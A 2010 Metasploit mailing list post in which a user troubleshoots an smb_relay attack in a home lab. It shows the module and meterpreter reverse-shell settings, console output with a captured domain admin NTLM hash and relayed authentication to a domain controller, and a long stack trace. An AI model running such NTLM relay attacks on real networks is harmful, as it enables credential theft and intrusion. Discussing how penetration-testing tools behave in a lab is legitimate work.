Metasploit mailing list archives

SMB_RELAY attacks still possible?

From: Brian S Traveling <epicdonk () gmail com>
Date: Fri, 24 Dec 2010 13:22:15 -0700

Hi,

Is it possible to still carry out smb_relay attacks by specifying a
different SMBHOST?  It doesn't seem to be working for me...  I was
under the assumption it was still possible...

my test environment:
domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to
domain)
metasploit box: 192.168.0.35 (not joined to domain)


msf exploit(smb_relay) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SMBHOST     192.168.0.1      no        The target SMB server (leave
empty for originating system)
  SRVHOST     192.168.0.35     yes       The local host to listen on.
  SRVPORT     445              yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming
connections
  SSLVersion  SSL3             no        Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread,
none, process
  LHOST     192.168.0.35     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) > [*] Received 192.168.0.2:62573
MYDOMAIN\domainadmin
LMHASH:000000000000000000000000000000000000000000000000
NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000
OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115):
Rex::Proto::SMB::Exceptions::ErrorCode The server responded with
error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in
`smb_recv_parse'/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in
`tree_connect'/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in
`connect'(eval):133:in `smb_haxor'(eval):530:in
`smb_cmd_session_setup'(eval):332:in
`smb_cmd_dispatch'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in
`smb_recv'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in
`on_client_data'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in
`start_service'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in
`call'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in
`on_client_data'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in
`monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in
`each'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in
`monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in
`start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in
`start'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in
`start_service'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in
`exploit'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in
`job_run_proc'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in
`run'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in
`call'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in
`start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in
`spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in
`spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in
`spawn'/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in
`start'/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in
`start_bg_job'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in
`run'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in
`exploit_simple'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in
`exploit_simple'/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in
`cmd_exploit'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in
`send'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in
`run_command'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in
`run_single'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in
`each'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in
`run_single'/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in
`run'/usr/local/bin/msfconsole:124/SMBRelay

Thanks!

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

SMB_RELAY attacks still possible? Brian S Traveling (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)
  - Re: SMB_RELAY attacks still possible? Kurt Grutzmacher (Dec 24)